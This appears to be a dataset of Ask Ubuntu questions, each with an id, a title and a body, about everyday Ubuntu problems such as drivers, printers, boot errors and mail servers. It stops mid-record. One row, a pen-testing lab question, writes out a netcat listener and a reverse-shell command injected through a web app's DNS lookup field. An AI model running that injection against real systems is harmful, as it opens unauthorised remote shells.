463281	why dont changes to the swappiness remain permanent after reboot ?	system ubuntu 14.04 i want to change my swappiness from the default 60 to 10 . according to this answer http : //askubuntu.com/a/103916/71679 i need to log in as root and edit /proc/sys/vm/swappiness and add or edit to vm.swappiness = 10 when opening that file as root i only see the number 60 when i add vm.swappiness = 10and try to save i get error writing /proc/sys/vm/swappiness : invalid argument if i simply change 60 to 10 the file saves without issue i check the changes take place with cat /proc/sys/vm/swappiness it shows the changes took place by editing this file as root i was under the assumption the changes would remain permanent but once i shut down and restart the default is back to 60 . why are n't the changes remaining permanent ? what writes the file back to 60 after reboot ?
463286	windows boot manager error ubuntu 14.04	my thinkpad arrived with windows 7 . i upgraded to windows 8 . shortly after i installed ubuntu 13.10 on a separate partition . shortly after windows crashed irretrievably ( no dvd , no access to anyone with win 8 to create dvd ) . so carried on using ubuntu and upgraded to 14.04 recently upgraded another laptop from xp to win 8.1 and decided to resurrect win 8 on the thinkpad on its original partition . no probs except now although both o/s are offered in the windows start panel only win 8 boots . this is the error info i get when trying to use ubuntu : windows boot manager file : \ubuntu\winboot\wubildr.mbr status : 0xc000000f info : the application or operating system could n't be loaded because a required file is missing or contains errors . any suggestions for a reasonably amateur user ? thanks
463287	shotwell / eye of gnome image viewer - image edit jpeg quality	introduction when you open an image with `` eye of gnome image viewer '' ( eog ) you can edit this image by pressing the edit image button . ( you might need to add the 'edit image ' button to the toolbar ) it opens your image in shotwell and you can do some basic editing : cropping , straightening , brightness , hue , ... . question how can i change the jpeg quality that shotwell uses when saving edited images ? example ( or : how i came up with this question ) when i copy a *.jpg image straight from my camera it has a filesize of 4.8mb for example . when i edit this image slightly the size goes down to 1.6mb . the edit is so small ( 1 point more or less brightness for example ) that the image change itself can not account for this heavy filesize reduction . so it must be the jpeg quality that shotwell is using when saving a jpg file i assume . example image ( unedited straight from nikon d3100 ) 4.2 mb : mega.co.nz -1 same image after slight edit 1.2mb : mega.co.nz-2 steps to reproduce the origin of my question : open above example image 1 with eog . click `` edit image '' the shotwell window pops up click the `` adjust '' button in this window give the `` exposure '' slider a nudge , just enough to have actually changed the image but as small as possible to minimise the effect on filesize now close the edit window , it will ask you if you want to keep changes , click yes
463289	ca n't get my canon lbp printer to run under ubuntu 14.04	i downloaded linux capt driver v2.60 from canon and installed both .deb packages , which were listed under the 64bit folder with ubuntu software-center . my canon printer still wo n't be recognized . is there anything else i have to do ? my printer is connected over usb . ubuntu would make a great replacment for my office , but unfortunately without printer support i will still rely on windows .
463290	keeping color from vim with grep	i like the way vim highlights the output from syslog . however , i only want the most recent outputs to be opened . i tried grep -- color=always `` $ @ '' /var/log/syslog > /tmp/fileout vim /tmp/fileout but it gives the bash color output like [ 033 ; m blah blah . if i do n't include -- color=always , there is no color at all . how can i do this ? ( i 'm using bash )
463295	how to update adobe flash player in kubuntu latest update	i 've been having problems with updating adobe flash player . i downloaded the tar.gz but to be honest i 'm completely lost from there .
463299	how can i set different permissions for files and folders separately ?	i want to apply 644 permissions only for all files in current directory , and 755 permissions only for subdirectories in current directory with chmod
463301	how to install apache with openssl 1.0.1 ?	i want to test heartbleed on apache server . i removed apache and openssl from my os ( ubutu 12.04 ) . i wonder how can i install apache with the openssl version 1.0.1 in order to be able to test this vulnerability on my own localhost ( apache server ) ?
463302	mistakes in terminal	i do n't know why , but after installing some programs there 's been a mistake in the terminal . so then every time when i update or trying to install a new package through terminal in the end a mistake appears : w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ trusty/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_trusty_partner_binary-i386_packages ) w : duplicate sources.list entry http : //repo.yandex.ru/yandex-disk/deb/ stable/main i386 packages ( /var/lib/apt/lists/repo.yandex.ru_yandex-disk_deb_dists_stable_main_binary-i386_packages ) w : you can do âťapt-get updateâť to correct a mistake . but when i write apt-get update then it says this : e : failed to open a blocked file /var/lib/apt/lists/lock - open ( 13 : access denied ) e : impossible to block catalog /var/lib/apt/lists/ e : failed to open a blocked file /var/lib/dpkg/lock - open ( 13 : access denied ) e : failed to block the lead catalog ( /var/lib/dpkg/ ) ; do you have the rights of superuser ?
463306	change color of command line text .	i thought that colored text was just something dictated by my gnome terminal preferences , however , i 've discovered there 's something slightly more to this because when i 'm on my ubuntu vps , text that should be colored ( git commands for example ) are just white . so my first question is , why does my vps have no colors and can i get them `` back '' relatively easily ? secondly , just so there is a visual distinction between my local terminal and the vps , is there a configuration file on the server i can edit , so that all text that normally would be white is now yellow or something ? a few times i 've been confused and then realised i 'm actually logged into my vps : p
463307	notify-send ca n't display popups	i have a problem with notify-send . it 's clearly visible that it tries to show the popups , but they only come up about 20 pixels at the bottom of the screen . then when it times out i see the whole popup blinking and disappearing as if the message crashed . easily reproducible by `` notify-send test '' however if run the same with sudo , the popup works but is in a different location and totally different style ( up in the top right corner with blue background and rounded corners ) as it 's not even using the same notify system ? the non sudo location is in the bottom right with grey background and non rounded corners . any ideas ? i am on kubuntu 14.04 , but the same problem existed also before i upgraded .
463310	ubuntu 14.04 + gnome 3.10 'alt + shift ' shortcut does n't work	i just installed fresh installation of ubuntu 14.04 x64 and i 've found that shortcut combination 'alt + shift ' to which i used to does n't work . i can successfully switch keyboard layout with 'super + space ' shortcut combination but it is inconvenient for me . i can see shortcuts on this screen and it seems that i should set 'alt + shift ' to 'switch to next source ' but not to 'modifiers-only switch to next source ' but it is impossible to assign this shortcut to that property . i 've seen some people can fix it with this 13.10 path but it does n't work for me . in fact when i press 'alt + shift ' it changes current language here : but when i type it types with previously selected language . what can i do about this ? i assume there should be a way to edit some config file to assign custom shortcut or maybe there another patch for 14.04 . thank you .
463312	msi gp60 2-od and non-functional	before and during installation of ubuntu 14.04 my usb mouse work perfectly , but after restart the usb mouse stop working . but thats not all . if i am using the touchpad , after few minutes whole system freeze . i have installed kernel 3.14 , but bugs is still there . does someone from users of msi gp60 2-od the same problem , or it is only with my ntb ? and is here someone , who knows , what i have to do for correct runnig of whole system ?
463313	245 mb ram are detected instead of 8 gb ubuntu 64 bits	i run free -m and i got 245 mb of available ram while i have 8 gb ! my bios detects 8 gb ! what can i do to 'recover back the ram space ? free -m outputs this : total used free shared buffers cached mem : 239 228 11 0 0 25 -/+ buffers/cache : 201 38 swap : 507 136 371 uname -a gives me this : linux httpcs-9 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:24 utc 2011 x86_64 x86_64 x86_64 gnu/linux lshw -c memory gives me this : *-firmware description : bios vendor : winbond electronics physical id : 0 version : a07 date : 04/25/2008 size : 64kib capacity : 960kib capabilities : isa pci pnp upgrade shadowing escd cdboot bootselect edd int13floppytoshiba int13floppy360 int13floppy1200 int13floppy720 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot biosbootspecification netboot *-cache:0 description : l1 cache physical id : 700 size : 16kib capacity : 16kib capabilities : internal write-through data *-cache:1 description : l2 cache physical id : 701 size : 1mib capacity : 2mib capabilities : internal write-back unified *-cache:0 description : l1 cache physical id : 703 size : 16kib capacity : 16kib capabilities : internal write-through data *-cache:1 description : l2 cache physical id : 704 size : 1mib capacity : 2mib capabilities : internal write-back unified *-memory description : system memory physical id : 1000 slot : system board or motherboard size : 8gib *-bank:0 description : dimm ddr2 synchronous 400 mhz ( 2,5 ns ) product : nld257r22503f-d32k vendor : 7f7f7f1600000000 physical id : 0 serial : 16530000 slot : dimm1_a size : 2gib width : 64 bits clock : 400mhz ( 2.5ns ) *-bank:1 description : dimm ddr2 synchronous 400 mhz ( 2,5 ns ) product : nld257r22503f-d32k vendor : 7f7f7f1600000000 physical id : 1 serial : 16467000 slot : dimm1_b size : 2gib width : 64 bits clock : 400mhz ( 2.5ns ) *-bank:2 description : dimm ddr2 synchronous 400 mhz ( 2,5 ns ) product : ebe10rd4abfa-4a-e vendor : 7f7ffe0000000000 physical id : 2 serial : 2209c4e2 slot : dimm2_a size : 1gib width : 64 bits clock : 400mhz ( 2.5ns ) *-bank:3 description : dimm ddr2 synchronous 400 mhz ( 2,5 ns ) product : hymp512r724-e3 vendor : hynix semiconductor ( hyundai electronics ) physical id : 3 serial : 00002201 slot : dimm2_b size : 1gib width : 64 bits clock : 400mhz ( 2.5ns ) *-bank:4 description : dimm ddr2 synchronous 400 mhz ( 2,5 ns ) product : 72t128000hr5a vendor : infineon ( siemens ) physical id : 4 serial : 011df515 slot : dimm3_a size : 1gib width : 64 bits clock : 400mhz ( 2.5ns ) *-bank:5 description : dimm ddr2 synchronous 400 mhz ( 2,5 ns ) product : m3 93t2950cz3-ccc vendor : samsung physical id : 5 serial : 46039316 slot : dimm3_b size : 1gib width : 64 bits clock : 400mhz ( 2.5ns ) cat /var/log/dmesg gives this : [ 0.699324 ] pci 0000:00:06.0 : pme # supported from d0 d3hot d3cold [ 0.699331 ] pci 0000:00:06.0 : pme # disabled [ 0.699382 ] pci 0000:00:1d.0 : [ 8086:24d2 ] type 0 class 0x000c03 [ 0.699431 ] pci 0000:00:1d.0 : reg 20 : [ io 0xbce0-0xbcff ] [ 0.699470 ] pci 0000:00:1d.1 : [ 8086:24d4 ] type 0 class 0x000c03 [ 0.699519 ] pci 0000:00:1d.1 : reg 20 : [ io 0xbcc0-0xbcdf ] [ 0.699558 ] pci 0000:00:1d.2 : [ 8086:24d7 ] type 0 class 0x000c03 [ 0.699607 ] pci 0000:00:1d.2 : reg 20 : [ io 0xbca0-0xbcbf ] [ 0.699664 ] pci 0000:00:1d.7 : [ 8086:24dd ] type 0 class 0x000c03 [ 0.699690 ] pci 0000:00:1d.7 : reg 10 : [ mem 0xfeb00000-0xfeb003ff ] [ 0.699783 ] pci 0000:00:1d.7 : pme # supported from d0 d3hot d3cold [ 0.699790 ] pci 0000:00:1d.7 : pme # disabled [ 0.699812 ] pci 0000:00:1e.0 : [ 8086:244e ] type 1 class 0x000604 [ 0.699861 ] pci 0000:00:1f.0 : [ 8086:24d0 ] type 0 class 0x000601 [ 0.699949 ] pci 0000:00:1f.1 : [ 8086:24db ] type 0 class 0x000101 [ 0.699966 ] pci 0000:00:1f.1 : reg 10 : [ io 0x0000-0x0007 ] [ 0.699978 ] pci 0000:00:1f.1 : reg 14 : [ io 0x0000-0x0003 ] [ 0.700018 ] pci 0000:00:1f.1 : reg 18 : [ io 0x0000-0x0007 ] [ 0.700031 ] pci 0000:00:1f.1 : reg 1c : [ io 0x0000-0x0003 ] [ 0.700042 ] pci 0000:00:1f.1 : reg 20 : [ io 0xfc00-0xfc0f ] [ 0.700054 ] pci 0000:00:1f.1 : reg 24 : [ mem 0x00000000-0x000003ff ] [ 0.700136 ] pci 0000:01:00.0 : [ 8086:0330 ] type 1 class 0x000604 [ 0.700192 ] pci 0000:01:00.0 : pme # supported from d0 d3hot d3cold [ 0.700198 ] pci 0000:01:00.0 : pme # disabled [ 0.700230 ] pci 0000:01:00.2 : [ 8086:0332 ] type 1 class 0x000604 [ 0.700287 ] pci 0000:01:00.2 : pme # supported from d0 d3hot d3cold [ 0.700292 ] pci 0000:01:00.2 : pme # disabled
463314	some icons not appearing in the topbar of xfce	some icons are not appearing in the top bar , like dropbox and skype ? any help ? i 've tried the indicator plugin but it crashes , any alternatives ?
463316	certain websites are not loading in 14.04	in ubuntu 14.04 , the internet connection established through ethernet ( dhcp ) , the all websites are loading perfectly . but through dsl some websites are not loading . for example http : //passportindia.gov.in/ , http : //www.sneaindia.com/ .
463319	ubuntu 14.04 left launcher does n't show up	i just migrated from 12.04 to 14.04 and i noticed that i ca n't open this launcher menu if i am not in 'dash' previously ( 12.04 ) i could touch left edge of the desktop to trigger this menu to open , but right now it is not possible . can someone point me how to achieve this ?
463321	how to check the progress of md5sum on many huge files ?	i have some 500 files of 650mb each , named bigfile.000 to bigfile.199 and i need to calculate the md5 checksum of all files combined . the command i am using is : cat bigfile . * | md5sum i have the time , and i understand it will take hours to complete , but i still want to check the progress . is there any way to do so ? like piping something in between and do a word count that does n't affect performance much ?
463322	how to fix build_one : function error ?	i 'm trying to separate audio and video from video file . after searching on the internet i came to know it can be done using ffmpeg . now i need to build ffmpeg library file for my android application using ubuntu version 14.04 ( 64-bit ) ndk r9 ffmpeg 2.2.2 while building it causes an error below line : build_android.sh : 9 : build_android.sh : function : not found . to fix that issue i searched on the internet and i got a solution . either in ./build_android.sh or in ./configure you have an extra ^m . open the files with vi and clean them from this garbage . i 've fixed it and tried by fixing some other solution also but remains the same . how can i fix this ?
463323	print hangs to dell aio 926	i have a dell aio 926 with xubuntu 14.04 . a quick search reveals it is in fact a rebranded lexmark x3650 . after adding the printer and messing around trying to get it to work , i am at a point where i can not print : sending print jobs simply has them queue behind the earliest one which is hanging at `` processing '' . flushing the queue and printing again creates a new , hanging , print job . steps taken : the lexmark installer for those are broken in linux ( does not accept authentication password ) so i followed this : http : //wiki.freegeek.org/index.php/lexmark_installer_issues added a printer using the settings > printers interface , selected the detected printer , selected lexmark 3600-4600 series , printing a test page and monitoring for messages reveals : a wrong printer was detected . all print jobs are cancelled . i tried debugging and getting more info following ubuntu wiki as far as i can see , it is recognized : $ lpinfo -v usb : //dell/photo % 20aio % 20printer % 20926 ? serial=6h0sf91 & interface=1 $ lsusb bus 001 device 004 : id 413c:5115 dell computer corp. photo aio printer 926 $ ls -l /dev/usb/lp* /dev/bus/usb/*/* /dev/bus/usb/001/004 [ ... ] /dev/usb/lp0 with permissions [ crw-rw-rw- 1 root lp ] on both dmesg | grep lp confirms the vid and pid ( printer found unplugged/plugged during my testing ) searching on the error in question , i found this page and followed the steps as closely as possible : it 's for a different printer so in my case : modified lx36-46.pdd and replaced the vid and pid respectively with 513c and 5115 modified 99-lexmark-08z.rules and added a line with those details modified lxdx.conf ( since lxdx was referred to in the pdd ) and replaced all instances of the vid and pid with the new values then i removed the old printer and added it again this time specifying the pdd explicitly using cups interface at localhost:631 now printing a test page leaves the printer hanging perpetually at `` processing ... '' so i guess i 've overcome the `` printer not recognized '' problem but there 's still an issue where the data seems to be not getting to the printer ... can anybody give me any pointers as to where to go next ? i 'm getting a little desperate as to what i can do to resolve this ... starting to think that lexmark/dell printers are a lost cause ... . did n't have this issue with hp and brother printers in the past ... edit just sent a print job via cups web interface , received in cups access_log : localhost - - [ 09/may/2014:12:22:32 +0100 ] `` post /printers/dell_photo_aio_printer_926hu http/1.1 '' 200 404 print-job successful-ok
463325	what does tar 's -p ( preserve permissions ) flag actually preserve ?	what does the -p flag actually preserve when creating and extracting a tarball ? is it the rwx permissions it preserves ? when i created a htdocs/ tarball owned by root , extracting it to my local machine changed the ownership from root to my user .
463326	keybord problem	new to 14.04 have choosed french for operating language . everything went well at the start but now system switched to english keyboard for unknown reasons . how can i fix it to french by default ?
463327	xububtu trusty - can not switch to other input methods when logged in with subsequently accounts created	i encounter this strange behaviour with xubuntu trusty . i have set up ibus for inputting chinese and japanese for the first user account created during installation . everything works as expected . however , switching to these input methods when logged in using additional accounts subsequently created does not work . ibus and supporting chinese and japanese client engines are installed and im-config is used to select ibus as the active configuration . any idea how to fix it ?
463329	make a link for a folder located inside windows 8.1 disk ( ubuntu 14.04 )	i want to make a link on my desktop for a folder located in windows 8.1 disk , every time i make a link to that folder it just does n't work after a reboot
463330	i can not get my wifi to work	i recently dual booted my macbook pro with ubuntu , and it is going great ! except one thing ... on my ubuntu operating system i can not get the wifi to connect . i can not even get the wifi option to come up at all . i have seen video after video on youtube but i still can not manage to install the drivers . whats going on ?
463333	ubuntu connected to network drive only shows 64.4 mb free space in properties window of shared folder	i was able to create a share in order to access my network drive by editing my /etc/fstab file . but when i check the properties window for each drive , it says only 64.4 mb of free space is available , even though i know each drive has a lot more . when i try to copy a large file to the drive , it tells me there is not enough room . but i still have the option to copy anyway . but there are some programs that just will not copy a large file if it assumes that there is not enough space . i was wondering if there was some way to correct this , or at least to `` fool '' it into seeing that there is a lot more space available . here is the result when i do a df : filesystem 1k-blocks used available use % mounted on /dev/sda1 19609276 12696448 5916732 69 % / udev 497348 4 497344 1 % /dev tmpfs 101232 832 100400 1 % /run none 5120 0 5120 0 % /run/lock none 506160 84 506076 1 % /run/shm //homeserver/admin 63556 656 62900 2 % /media/windowsshare .host : / 63556 656 62900 2 % /mnt/hgfs
463337	asus k50ij webcam problem	hello again ubuntu community ! i have a problem again . i installed ubuntu 14.04 32bit on my asus k50ij laptop and whenever i try to make a skype call with the camera on it flips my image upside down . i 've searched a lot of threads and no luck . maybe someone could give an opinion ?
463339	partition problem	so i installed trusty tahr alongside xp yesterday because i got bored of the stupid green hill , it works like a charm but there 's only one 6gb partition for the os and i ca n't even resize it should i just remove xp ? or what should i do to make it larger ?
463341	how to install pythoncard ? ( any alternate method )	how to install pythoncard ? i have tried browsing the software center for it and i installed it , but when i run a pythoncard-based program , it shows me that there is no module named pythoncard.can i install it using some other way ? what could be its reason ?
463343	ec2 virtual server receives requests but can not access another host	staff i have a virtual machine in amazon aws ubuntu where i even installed apache2 , php5 and mysql . everything was running well , well configured , my website running fine on it . until suddenly stopped the virtual machine to access other hosts . this happens for every request . i found this out when a php script began giving error 'connection timed out ' when using the file_get_contents ( ) function < ? php echo file_get_contents ( 'http : //example.com ' ) ; ? > i went to the command line of the server via ssh , and tried to ping an external host ping google.com and nothing . i tried to use apt-get to update the system apt-get update and also does not connect . ie my ec2 server is not connecting to anything external . the funny thing is that if i try to access the site , the server usually receives the request and return the site to the browser . ie , the internet connection is there . autumn detail is that this access to file_get_contents ( ) php i 'm trying to do is also on the same site , not on an external site , and yet the timed out . here the result of netstat -lnp command : active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 957/sshd tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen 1098/mysqld tcp6 0 0 : ::22 : : : * listen 957/sshd tcp6 0 0 : ::443 : : : * listen 1145/apache2 tcp6 0 0 : ::80 : : : * listen 1145/apache2 udp 0 0 0.0.0.0:68 0.0.0.0 : * 560/dhclient udp 0 0 0.0.0.0:18032 0.0.0.0 : * 560/dhclient udp6 0 0 : ::60689 : : : * 560/dhclient active unix domain sockets ( only servers ) proto refcnt flags type state i-node pid/program name path unix 2 [ acc ] stream listening 8236 785/dbus-daemon /var/run/dbus/system_bus_socket unix 2 [ acc ] stream listening 6500 1/init @ /com/ubuntu/upstart unix 2 [ acc ] stream listening 8549 965/acpid /var/run/acpid.socket unix 2 [ acc ] seqpacket listening 6797 324/systemd-udevd /run/udev/control unix 2 [ acc ] stream listening 8919 1098/mysqld /var/run/mysqld/mysqld.sock here the result of eating iptables-l : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination what might be happening ?
463344	how to open reverse shell from nowasp ?	i 'm using 12.04 lts and the server is 12.04 lts server . so , i 'm teaching myself some pen testing and right now i 'm trying to use netcat to open a reverse shell from nowasp , my nowasp is on a vm and in same network as my host . first , i type in sudo nc -l -k -v 6666 on my host , i do n't get a listning to ... msg but if i check netstat -lnptu i get tcp 0 0 0.0.0.0:6666 0.0.0.0 : * listen now , i enter nowasps highly vulnerable `` app injection '' and use dns lookup which essentially gives me access to its shell , but i ca n't use bash yet because it is n't interactive , so in order to open a reverse shell i used ; /bin/bash | nc.openbsd 172.16.55.1 6666 at first : the moment i do that , my host ( the listening one ) gets : connection from 172.16.55.128 port 6666 [ tcp/* ] accepted but instantly after that , the connection seems to close and i 'm back in my own ( host 's ) shell . update ( thanks to jos ) the connection stays open but , i do n't get any feedback , if i type in ls nothing appears , but i can keep writing commands . when i replicated the same command from the servers shell itself ( just entering /bin/bash | nc 172.16.55.1 10101 the connection does work from the host but if i type in ls on host , ls appears on the server , without any output .
463348	no applications in dash	i think that , due to latest trusty s/w updates , none of my applications ( including standard trusty installed ones ) are available from the dash ! or have i done something to cause this ? the applications category is enabled on categories & sources . ps this is only happening on my desktop i.e . not on my laptop . both computers had clean installs of trusty .
463349	groups : can not find name for group id # # # # # # # # #	this is a variant of the unresolved can not find name for group id 26739201 but i 'll post it here again since i have some more information i recently made a fresh installation of 14.04 so most things `` should '' be clean . when i open the terminal , i get this error message groups : can not find name for group id # # # # # # the group number changes every time i log out and log in again : # # # # # # = 1097638658 # # # # # # = 1097638674 # # # # # # = 1097638677 # # # # # # = 1097638680 # # # # # # = 1097638683 # # # # # # = 1097646472 ( here i also rebooted ) on subsequent logins . at the same time i notice that i have problems creating new users from the settings menu . i can create new users but not set their password . if i let the new users be without password i get kicked out whenever i try to log in with them . any ideas ? [ edit ] starting the shell ( today ) and asking for id i get groups : can not find name for group id 1097972621 mikael @ glasbult : ~ $ id uid=1000 ( mikael ) gid=1000 ( mikael ) , groups=1000 ( mikael ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,108 ( lpadmin ) ,124 ( sambashare ) ,1097972621 at the end out the output i notice a matching id : 1097972621 [ new info ] not sure if i should answer my own question or put it here . i mentioned the problem to my local sysadmin and he said the strange group number is an afs-artefact . it 's necessary for pag , which gives a user the same rights in all sub-shell . thus it 's not an error , just an ugly nuisance . case closed i suppose .
463351	how to add string to a specific line of file	my code is , < ? php $ data = file_get_contents ( 'file.conf ' ) ; $ rows = explode ( `` \n '' , $ data ) ; $ rcount = count ( $ rows ) ; echo $ rcount ; for ( $ l=0 ; $ l < $ rcount ; $ l++ ) { $ rowss = $ rows [ $ l ] ; if ( $ rowss == `` [ default ] '' ) { file_put_contents ( $ rowss , `` \nhi '' , file_append | lock_ex ) or die ( `` < br > oops '' ) ; } } ? > output is , 52 oops and my file ( file.conf ) contains 52 rows that is printed successfully , but cant write on that file i need to add some string like `` hi '' to the end of `` [ default ] '' line example , my file is eastern=america/new_york|'vm-received ' q 'digits/at ' imp central=america/chicago|'vm-received ' q 'digits/at ' imp central24=america/chicago|'vm-received ' q 'digits/at ' h n 'hours' military=zulu|'vm-received ' q 'digits/at ' h n 'hours ' 'phonetic/z_p' european=europe/copenhagen|'vm-received ' a d b 'digits/at ' hm [ default ] 1234 = > 4242 , example mailbox , root @ localhost ; 4200 = > 9855 , mark spencer , markster @ linux- support.net , mypager @ digium.com , attach=no|serveremail=myaddy @ digium.com|tz=central|maxmsg= 10 ; 4300 = > 3456 , ben rigas , ben @ american-computer.net ; 4310 = > -5432 , sales , sales @ marko.net pls help me thank u
463353	macbook air - with ubuntu 14.04 how can i take print screen , page up/down cause there is no keyboard button	macbook air - running ubuntu 14.04 64-bit linux s 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux a ) how to fix the keyboard keys which are not available in the built in macbook air keyboard ? 1. home key 2. end key 3. screen lock key 4. pause or break key 5. ins key 6. del key 7. page up ( seems to be working by pressing fn + up ) 8. page down ( seems to be working by pressing fn + down ) b ) mouse pad is not accurate while dragging it clicks without even i clicked on it , using external usb mouse .
463354	ubuntu wiped the entire hard drive after selecting reinstall ubuntu option	ubuntu just wiped the entire hard drive after selecting reinstall ubuntu option . i thought it would re-install in the same partition where ubuntu was previously installed . now i do n't know what to do , can i still recover my files on the other partition . if so , how ? please help i have some important files in there .
463355	ubuntu not detecting any usb device	i have installed ubuntu 13.10 on virtualbox which is running on windows . i 'm using reliance netconnect+ [ usb internet ] where it is not detected by ubuntu . i tried ubuntu command , its not showing any connected usb : lsusb http : //s21.postimg.org/7215vpos7/ubuntu_desktop.png where vbox shows all connected usb 's successfully http : //s28.postimg.org/l8cwjhezh/vbox_ubuntu.jpg ubuntu is not detecting even normal pendrive please help me to find whats wrong
463356	how to find configuration files ?	i know that the /etc folder handles different configuration files , but how does one know where the configuration files of a service ( iscsi target for example ) are located ?
463358	restart lightdm - are my applications gone ?	so i have machine with an ati graphics card which means restart lightdm is my second most used command right after ll . my question is , does restart lightdm blow away all the applications that were running on my desktop ? not that this is a bad thing , i would never lose something important , but more regarding memory . i am always afraid that the desktop applications somehow become orphaned and they just sit in memory and never go away . i check ps but it is n't so clear . many applications have on going threads and you ca n't tell if they should be killed . thanks in advance !
463366	no releases available for package	i 'm trying to install some pear packages such as gnupg in a ubuntu os in virtualbox , but if i use sudo pecl install gnupg using , sudo pecl install gnupg it throws no releases available for package `` pecl.php.net/gnupg '' install failed it is not only happening for gnupg , but for all pear packages . but i could n't identify what exactly the issue is . the same command is working in my another virtual machine . so i 'm really confused . please help .
463368	which version of banshee in repos with ubuntu 14.04	i need to know which version of banshee is the one in repos of ubuntu 14.04 according to http : //packages.ubuntu.com/trusty/sound/banshee it is 2.9.0+really2.6.2-2ubuntu2 , so its is 2.9.0 or 2.6.2 ? ? knowing that , banshee codebase has the two releases ( 2.9.0 and 2.6.2 ) and between the two there are 4 months of work . ( according to https : //github.com/gnome/banshee/releases )
463369	add printers suport in a minimal xubuntu install	i did a minimal install of xubuntu on an old notebook . but could not figure out which packages should i install to enable support for printers . what packages should i install to an hp deskjet f4180 all in one printer ? apparently only cups is not sufficient . also i could not enable printer 's scanner . thanks for the assistance .
463371	xperia z network item stuck in network manager applet	in the network manager applet on ubuntu 14.04 lts i have an extra item called 'xperia z network ' with the network name 'xperia z ' and a greyed out status 'disconnected ' . unfortunately i ca n't take a screenshot of the applet ( it closes if i press print screen ) . this item is between 'ethernet network ' and 'wifi networks ' . if i click on 'edit connections ' the item is not there and there is no network by the same name to remove . i do own an xperia z , so it somehow made a connection with it once . but the menu item remains there even if the phone is powered off and ubuntu rebooted . also the only connection i ever made with the phone is by setting up a tethered hotspot from my phone , with a different name . so why is the item in my network manager and how do i get it to go away and not reappear .
463372	lightdm : can not type password on login screen	i am running 12.04 lts , fully updated . my system is configured to automatically log me in into my account . auto-login works fine . however , sometimes i need to access the unity-greeter/lightdm login screen . for example , this happens when i log out and then want another user want to log into their account . the interface we get is exactly the one shown on the wikipedia page for lightdm : the password prompt is grayed out and i am unable to type my password the mouse moves fine but i can not click the system icons on the top-right corner of the menu bar does not work i can switch using ctrl-alt-f ? to a console and login fine using the text/console login prompt . if i kill x , i am again returned to the same unusable login screen . how can i fix this ? how can a user log into their graphical environment without having to reboot the system ?
463373	upgrade to 14.04 only did half upgrade	when i tried upgrading to 14.04 from 13.10 it said it could only upgrade half , then i would have to upgrade the other half . well after the first half upgraded , it never mentioned to upgrade the other half . it will never update . it will say there are updates and i have a exclamation mark in the toolbar and i click install updates ... nothing happens . when i use the updater it says its installing then it says all software is up to date and wont install anything but will continually say updates are available . i tried to run `` apt-get update & & apt-get dist-upgrade '' but got a bunch of errors . here is the paste bin of the results . http : //pastebin.com/3nttib2c i do n't know what else to do a this point . i would love to avoid a clean install because i have a lot to backup and it will take me a while to backup everything manually . thank you everyone for your help ! _ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - i had to do a clean install . restoring the ppas did n't work . it kept retrieving the old ppas again . could not figure out any other way than a clean upgrade .
463377	triple boot windows ubuntu and pear linux	what impact , if multiboot more than 2 , .. ? i now dual boot windows 8.1 and ubuntu 13.10 i would like to try the pear os but i was reluctant to remove the other os , .. what i have to reformat another os to try or i try tripleboot
463380	difference between apt-get -d install & apt-get download	apt ( advanced packaging tool ) has option to download only package by apt-get -d install [ pkg-name ] . i have also find apt-get download [ pkg-name ] to download packages . then what is the difference between -- download-only ( apt-get -d install ) and download ( apt-get download ) ? and when should i use between them ?
463382	how to install mysql 5.6 in ubuntu 14.04 desktop ?	which are the steps to install mysql in ubuntu 14.04 ( trusty tahr ) ?
463386	is there a short way to purge all printer configurations ?	an ubuntu 14.04 which i have been maintaining has a lot of non-working printer configurations . i 'd like to purge it all and configure only the working ones from the scratch . any ideas to remove them all preferably via command line ?
463390	asus k55v , two graphics cards , how to set up a second card as a major ?	i have laptop asus k55v with two graphic cards : 1 . intel hd3000 2 . geforce 610m i know bumblebee but it is not what i want . i need to set geforce card as the main and only graphic card in system . do you know how to do that ?
463394	postfix + dovecot server problem	problem list from the squirrelmail e-mail is sending but not receiving in inbox all e-mails are going in spam please help me out of this , thanks in advance my postfix main.cf [ quote ] # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters # smtpd_recipient_restrictions = permit_sasl_authenticated smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . myhostname = ubuntu-server-new alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = mail.xyz , localhost.localdomain , ubuntu-server-xyz , xyz.com , mail.abc.com relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 x.x.x.x.0/27 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = ipv4 [ /quote ] dovecot settings file dovecot.conf [ quote ] # # dovecot configuration file # if you 're in a hurry , see http : //wiki2.dovecot.org/quickconfiguration # `` doveconf -n '' command gives a clean output of the changed settings . use it # instead of copy & pasting files when posting to the dovecot mailing list . # ' # ' character and everything after it is treated as comments . extra spaces # and tabs are ignored . if you want to use either of these explicitly , put the # value inside quotes , eg . : key = `` # char and trailing whitespace `` # default values are shown for each setting , it 